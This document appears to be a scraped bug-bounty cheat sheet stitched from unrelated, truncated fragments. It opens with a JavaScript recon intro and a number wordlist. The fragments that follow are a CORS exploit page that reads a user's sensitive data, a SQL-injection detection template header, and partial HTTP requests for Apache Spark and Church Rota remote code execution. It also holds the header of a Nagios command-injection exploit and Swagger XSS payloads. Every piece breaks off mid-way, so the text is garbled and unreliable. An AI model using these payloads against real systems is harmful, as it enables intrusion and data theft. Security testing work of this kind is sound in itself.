This is a simple guide to perform javascript recon in the bugbounty
- The first step is to collect possibly several javascript files (
more files=more paths,parameters->more vulns)
| 0 | |
| 00 | |
| 01 | |
| 02 | |
| 03 | |
| 1 | |
| 1.0 | |
| 10 | |
| 100 | |
| 1000 |
| <html> | |
| <body> | |
| <button type='button' onclick='cors()'>CORS</button> | |
| <p id='demo'></p> | |
| <script> | |
| function cors() { | |
| var xhttp = new XMLHttpRequest(); | |
| xhttp.onreadystatechange = function() { | |
| if (this.readyState == 4 && this.status == 200) { | |
| var a = this.responseText; // Sensitive data from niche.co about user account |
| id: SQLInjection_ERROR | |
| info: | |
| name: SQLINJECTION Detection | |
| author: 0x240x23elu & OFJAAAH | |
| severity: High | |
| requests: | |
| - method: GET |
Apache Sprak RCE
POST /v1/submissions/create HTTP/1.1
Host: ip:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 619
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip
{
| #!/usr/bin/env python | |
| intro = """\033[94m | |
| Nagios Core < 4.2.0 Curl Command Injection PoC Exploit (CVE-2016-9565) | |
| nagios_cmd_injection.py ver. 1.0 | |
| Discovered & Coded by: | |
| Dawid Golunski | |
| https://legalhackers.com | |
| \033[0m |
| { | |
| "swagger": "2.0", | |
| "info": { | |
| "title": "Swagger Test Poc XSS", | |
| "description": "Please to click Terms of service", | |
| "termsOfService": "javasript:alert(document.domain)", | |
| "version": "1.0.1" | |
| }, | |
| "basePath": "/v1", | |
| "schemes": [ |
| swagger: '2.0' | |
| info: | |
| title: Swagger Test | |
| description: <img src=x onerror=\"alert(document.domain)\"> | |
| default: <script>console.log(‘000000000000000000dad0000000000000000000');</script> | |
| license: | |
| name: BSD | |
| url: <img src=x onerror=\"alert(document.domain)\"> | |
| version: '30' | |
| produces: |
Church Rota version 2.6.4 is vulnerable to authenticated remote code execution. The user does not need to have file upload permission in order to upload and execute an arbitrary file.
POST /resources.php?action=newsent HTTP/1.1
Host: 192.168.43.187
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------36504512417128952451539028145
Content-Length: 526"><script>alert(/XSS/)</script>